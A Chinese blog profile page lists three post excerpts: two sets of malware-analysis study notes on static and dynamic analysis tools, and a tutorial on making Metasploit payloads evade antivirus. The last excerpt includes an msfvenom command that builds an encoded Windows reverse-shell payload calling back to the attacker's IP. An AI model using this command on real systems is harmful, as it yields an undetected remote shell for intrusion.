- 博客(3)
- 收藏
- 关注
原创 恶意代码分析实战(二)
恶意代码分析实战(二) 动态分析基础 1.沙箱 沙箱可以简单的运行可执行程序但是沙箱不能分析一些需要特定的条件才能运行的恶意程序,沙箱不能记录所有的事件。 2.运行恶意代码 运行dll程序使用rundll32.exe程序 语法为 rundll32.exe DLLNAME,EXPORT ARGUMENTS EXPORT为dll中的函数名或序号. 3.进程监视器 使用process monitor 监控注册表,文件,网络,进程行为 4.使用进程浏览器来查看进程 使用process explorer 可以查看进程
2021-12-05 01:32:28 959
原创 恶意代码分析实战学习笔记(一)
恶意代码分析实战学习笔记(一) 静态技术分析基础 1.使用md5deep 来识别恶意代码的哈希值 2.使用strings 来查看恶意代码的字符串,从中查看有用的线索,加过壳的恶意代码的字符串会很少。 3.使用peid程序来检查程序的加壳的情况 4.使用dependency walker来探测动态链接函数 常见函数: kernel32.dll :包含核心系统功能,如访问和操作系统内存,文件和硬件 Advapi.dll:提供了对核心windows组件的访问,比如服务器和注册表 User32.dll:包含了用户界
2021-11-29 01:21:53 3596
原创 2020-12-03
msf生成的payload的简单免杀 通常利用msf生成的payload在不做任何处理的情况下会被杀软直接干掉,所有需要进行一些操作来进行免杀。 这里我使用的是大蜘蛛杀毒软件来做的实验 msf内置编码器 输入msfvenom -l encoders 会出现msf提供的几种编码方式,使用这些编码对payload进行编码 msfvenom - p windows/shell/reverse_tcp -lhsot 本机ip -lport 端口 -e 编码方式 -i 编码次数 -f 文件格式 -o 文件路径与名称
2020-12-03 00:40:39 561
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人